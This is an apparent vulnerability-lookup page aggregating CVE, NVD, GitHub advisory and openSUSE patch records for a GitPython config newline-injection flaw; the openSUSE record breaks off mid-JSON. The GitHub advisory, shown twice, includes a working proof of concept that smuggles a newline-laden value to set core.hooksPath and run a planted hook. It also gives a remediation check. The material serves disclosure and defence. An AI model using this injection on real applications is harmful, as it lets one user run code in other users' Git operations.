Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-44244 (GCVE-0-2026-44244)
Vulnerability from cvelistv5 – Published: 2026-05-07 18:22 – Updated: 2026-05-09 03:56
VLAI
EPSS
Title
GitPython: Newline injection in config_writer().set_value() enables RCE via core.hooksPath
Summary
GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python's configparser without validating for newlines. GitPython's own _write() converts embedded newlines into indented continuation lines (e.g. \n becomes \n\t), but Git still accepts an indented [core] stanza as a section header — so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49.
Severity
7.8 (High)
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/gitpython-developers/GitPython… | x_refsource_CONFIRM |
| https://github.com/gitpython-developers/GitPython… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| gitpython-developers | GitPython |
Affected:
< 3.1.49
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-44244",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-09T03:56:04.115Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "GitPython",
"vendor": "gitpython-developers",
"versions": [
{
"status": "affected",
"version": "\u003c 3.1.49"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python\u0027s configparser without validating for newlines. GitPython\u0027s own _write() converts embedded newlines into indented continuation lines (e.g. \\n becomes \\n\\t), but Git still accepts an indented [core] stanza as a section header \u2014 so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T18:22:39.704Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67"
},
{
"name": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49"
}
],
"source": {
"advisory": "GHSA-v87r-6q3f-2j67",
"discovery": "UNKNOWN"
},
"title": "GitPython: Newline injection in config_writer().set_value() enables RCE via core.hooksPath"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-44244",
"datePublished": "2026-05-07T18:22:39.704Z",
"dateReserved": "2026-05-05T16:33:55.844Z",
"dateUpdated": "2026-05-09T03:56:04.115Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-44244",
"date": "2026-05-28",
"epss": "0.00023",
"percentile": "0.06811"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-44244\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-07T19:16:02.357\",\"lastModified\":\"2026-05-11T17:44:36.497\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python\u0027s configparser without validating for newlines. GitPython\u0027s own _write() converts embedded newlines into indented continuation lines (e.g. \\\\n becomes \\\\n\\\\t), but Git still accepts an indented [core] stanza as a section header \u2014 so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:gitpython_project:gitpython:*:*:*:*:*:python:*:*\",\"versionEndExcluding\":\"3.1.49\",\"matchCriteriaId\":\"70BE59C2-ACE5-4E12-AC75-DCCE43007E3F\"}]}]}],\"references\":[{\"url\":\"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Release Notes\"]},{\"url\":\"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44244\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-07T20:09:23.508810Z\"}}}], \"references\": [{\"url\": \"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-07T20:08:36.502Z\"}}], \"cna\": {\"title\": \"GitPython: Newline injection in config_writer().set_value() enables RCE via core.hooksPath\", \"source\": {\"advisory\": \"GHSA-v87r-6q3f-2j67\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"gitpython-developers\", \"product\": \"GitPython\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.1.49\"}]}], \"references\": [{\"url\": \"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67\", \"name\": \"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49\", \"name\": \"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python\u0027s configparser without validating for newlines. GitPython\u0027s own _write() converts embedded newlines into indented continuation lines (e.g. \\\\n becomes \\\\n\\\\t), but Git still accepts an indented [core] stanza as a section header \\u2014 so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-07T18:22:39.704Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-44244\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-09T03:56:04.115Z\", \"dateReserved\": \"2026-05-05T16:33:55.844Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-07T18:22:39.704Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-44244
Vulnerability from fkie_nvd - Published: 2026-05-07 19:16 - Updated: 2026-05-11 17:44
Severity
Summary
GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python's configparser without validating for newlines. GitPython's own _write() converts embedded newlines into indented continuation lines (e.g. \n becomes \n\t), but Git still accepts an indented [core] stanza as a section header — so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49 | Patch, Release Notes | |
| security-advisories@github.com | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67 | Exploit, Mitigation, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67 | Exploit, Mitigation, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| gitpython_project | gitpython | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gitpython_project:gitpython:*:*:*:*:*:python:*:*",
"matchCriteriaId": "70BE59C2-ACE5-4E12-AC75-DCCE43007E3F",
"versionEndExcluding": "3.1.49",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "GitPython is a python library used to interact with Git repositories. Prior to version 3.1.49, GitConfigParser.set_value() passes values to Python\u0027s configparser without validating for newlines. GitPython\u0027s own _write() converts embedded newlines into indented continuation lines (e.g. \\n becomes \\n\\t), but Git still accepts an indented [core] stanza as a section header \u2014 so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path. This issue has been patched in version 3.1.49."
}
],
"id": "CVE-2026-44244",
"lastModified": "2026-05-11T17:44:36.497",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-07T19:16:02.357",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Release Notes"
],
"url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-94"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-V87R-6Q3F-2J67
Vulnerability from github – Published: 2026-05-06 21:58 – Updated: 2026-05-08 21:52
VLAI
Summary
GitPython: Newline injection in config_writer().set_value() enables RCE via core.hooksPath
Details
GitConfigParser.set_value() passes values to Python's configparser without validating for newlines. GitPython's own _write() converts embedded newlines into indented continuation lines (e.g. \n becomes \n\t), but Git still accepts an indented [core] stanza as a section header — so the injected core.hooksPath becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path.
The vulnerability is not merely malformed config output: GitPython's own writer converts embedded newlines into indented continuation lines, but Git still accepts an indented [core] stanza as a section header, so the injected core.hooksPath becomes effective configuration.
This was found while auditing MLRun's project.push() method, which passes author_name and author_email directly to config_writer().set_value() with no sanitization. Both parameters cross a trust boundary — they are caller-supplied API inputs that end up in .git/config.
PoC (standalone, no MLRun required):
import git, subprocess, os
repo = git.Repo("/tmp/testrepo")
with repo.config_writer() as cw:
cw.set_value("user", "name", "foo\n[core]\nhooksPath=/tmp/hooks")
r = subprocess.run(["git", "config", "core.hooksPath"], cwd="/tmp/testrepo", capture_output=True, text=True)
assert r.returncode == 0
print(r.stdout.strip()) # /tmp/hooks
os.makedirs("/tmp/hooks", exist_ok=True)
open("/tmp/hooks/pre-commit", "w").write("#!/bin/sh\nid > /tmp/pwned\n")
os.chmod("/tmp/hooks/pre-commit", 0o755)
repo.index.add(["README"])
repo.git.commit(m="test")
print(open("/tmp/pwned").read()) # uid=...
Tested on GitPython 3.1.46, git 2.39+.
Impact: This is persistent repo config poisoning. Any user who can supply author_name or author_email to an application calling config_writer().set_value() can redirect Git hook execution to an arbitrary path. In a multi-user or hosted environment (e.g. a shared MLRun server where multiple users push to the same repositories), one user can poison the .git/config of a shared repo and have their hooks run in the context of every subsequent Git operation by any user. On single-user deployments, the impact depends on whether the application later invokes Git hooks automatically.
Remediation: set_value() should raise on CR, LF, or NUL in values rather than silently pass them through:
import re
if isinstance(value, (str, bytes)) and re.search(r"[\r\n\x00]", str(value)):
raise ValueError("Git config values must not contain CR, LF, or NUL")
Rejecting is safer than stripping — a stripped newline might indicate the caller is passing unsanitized input at a higher level, and silent normalization masks that.
Affected wherever config_writer().set_value(section, key, user_input) is called with external input.** GitPython is a dependency of DVC, MLflow, Kedro, and others — worth auditing their set_value() call sites for externally influenced inputs.
Severity
7.8 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.48"
},
"package": {
"ecosystem": "PyPI",
"name": "GitPython"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.49"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44244"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T21:58:00Z",
"nvd_published_at": "2026-05-07T19:16:02Z",
"severity": "HIGH"
},
"details": "`GitConfigParser.set_value()` passes values to Python\u0027s `configparser` without validating for newlines. GitPython\u0027s own `_write()` converts embedded newlines into indented continuation lines (e.g. `\\n` becomes `\\n\\t`), but Git still accepts an indented `[core]` stanza as a section header \u2014 so the injected `core.hooksPath` becomes effective configuration. Any Git operation that invokes hooks (commit, merge, checkout) will then execute scripts from the attacker-controlled path.\n\nThe vulnerability is not merely malformed config output: GitPython\u0027s own writer converts embedded newlines into indented continuation lines, but Git still accepts an indented `[core]` stanza as a section header, so the injected `core.hooksPath` becomes effective configuration.\n\nThis was found while auditing MLRun\u0027s `project.push()` method, which passes `author_name` and `author_email` directly to `config_writer().set_value()` with no sanitization. Both parameters cross a trust boundary \u2014 they are caller-supplied API inputs that end up in `.git/config`.\n\nPoC (standalone, no MLRun required):\n\n```python\nimport git, subprocess, os\n\nrepo = git.Repo(\"/tmp/testrepo\")\n\nwith repo.config_writer() as cw:\n cw.set_value(\"user\", \"name\", \"foo\\n[core]\\nhooksPath=/tmp/hooks\")\n\nr = subprocess.run([\"git\", \"config\", \"core.hooksPath\"], cwd=\"/tmp/testrepo\", capture_output=True, text=True)\nassert r.returncode == 0\nprint(r.stdout.strip()) # /tmp/hooks\n\nos.makedirs(\"/tmp/hooks\", exist_ok=True)\nopen(\"/tmp/hooks/pre-commit\", \"w\").write(\"#!/bin/sh\\nid \u003e /tmp/pwned\\n\")\nos.chmod(\"/tmp/hooks/pre-commit\", 0o755)\n\nrepo.index.add([\"README\"])\nrepo.git.commit(m=\"test\")\nprint(open(\"/tmp/pwned\").read()) # uid=...\n```\n\nTested on GitPython 3.1.46, git 2.39+.\n\nImpact: This is persistent repo config poisoning. Any user who can supply `author_name` or `author_email` to an application calling `config_writer().set_value()` can redirect Git hook execution to an arbitrary path. In a multi-user or hosted environment (e.g. a shared MLRun server where multiple users push to the same repositories), one user can poison the `.git/config` of a shared repo and have their hooks run in the context of every subsequent Git operation by any user. On single-user deployments, the impact depends on whether the application later invokes Git hooks automatically.\n\nRemediation: `set_value()` should raise on CR, LF, or NUL in values rather than silently pass them through:\n\n```python\nimport re\n\nif isinstance(value, (str, bytes)) and re.search(r\"[\\r\\n\\x00]\", str(value)):\n raise ValueError(\"Git config values must not contain CR, LF, or NUL\")\n```\n\nRejecting is safer than stripping \u2014 a stripped newline might indicate the caller is passing unsanitized input at a higher level, and silent normalization masks that.\n\nAffected wherever `config_writer().set_value(section, key, user_input)` is called with external input.** GitPython is a dependency of DVC, MLflow, Kedro, and others \u2014 worth auditing their `set_value()` call sites for externally influenced inputs.",
"id": "GHSA-v87r-6q3f-2j67",
"modified": "2026-05-08T21:52:28Z",
"published": "2026-05-06T21:58:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-v87r-6q3f-2j67"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44244"
},
{
"type": "PACKAGE",
"url": "https://github.com/gitpython-developers/GitPython"
},
{
"type": "WEB",
"url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.49"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "GitPython: Newline injection in config_writer().set_value() enables RCE via core.hooksPath"
}
OPENSUSE-SU-2026:10758-1
Vulnerability from csaf_opensuse - Published: 2026-05-12 00:00 - Updated: 2026-05-12 00:00Summary
python311-GitPython-3.1.49-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: python311-GitPython-3.1.49-1.1 on GA media
Description of the patch: These are all security issues fixed in the python311-GitPython-3.1.49-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10758
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
8.8 (High)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
6.5 (Medium)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
7.8 (High)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-GitPython-3.1.49-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-GitPython-3.1.49-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-GitPython-3.1.49-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
11 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-GitPython-3.1.49-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-GitPython-3.1.49-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10758",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10758-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42215 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44243 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44244 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44244/"
}
],
"title": "python311-GitPython-3.1.49-1.1 on GA media",
"tracking": {
"current_release_date": "2026-05-12T00:00:00Z",
"generator": {
"date": "2026-05-12T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10758-1",
"initial_release_date": "2026-05-12T00:00:00Z",
"revision_history": [
{
"date": "2026-05-12T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-GitPython-3.1.49-1.1.aarch64",
"product": {
"name": "python311-GitPython-3.1.49-1.1.aarch64",
"product_id": "python311-GitPython-3.1.49-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-GitPython-3.1.49-1.1.aarch64",
"product": {
"name": "python313-GitPython-3.1.49-1.1.aarch64",
"product_id": "python313-GitPython-3.1.49-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-GitPython-3.1.49-1.1.aarch64",
"product": {
"name": "python314-GitPython-3.1.49-1.1.aarch64",
"product_id": "python314-GitPython-3.1.49-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-GitPython-3.1.49-1.1.ppc64le",
"product": {
"name": "python311-GitPython-3.1.49-1.1.ppc64le",
"product_id": "python311-GitPython-3.1.49-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-GitPython-3.1.49-1.1.ppc64le",
"product": {
"name": "python313-GitPython-3.1.49-1.1.ppc64le",
"product_id": "python313-GitPython-3.1.49-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-GitPython-3.1.49-1.1.ppc64le",
"product": {
"name": "python314-GitPython-3.1.49-1.1.ppc64le",
"product_id": "python314-GitPython-3.1.49-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-GitPython-3.1.49-1.1.s390x",
"product": {
"name": "python311-GitPython-3.1.49-1.1.s390x",
"product_id": "python311-GitPython-3.1.49-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-GitPython-3.1.49-1.1.s390x",
"product": {
"name": "python313-GitPython-3.1.49-1.1.s390x",
"product_id": "python313-GitPython-3.1.49-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-GitPython-3.1.49-1.1.s390x",
"product": {
"name": "python314-GitPython-3.1.49-1.1.s390x",
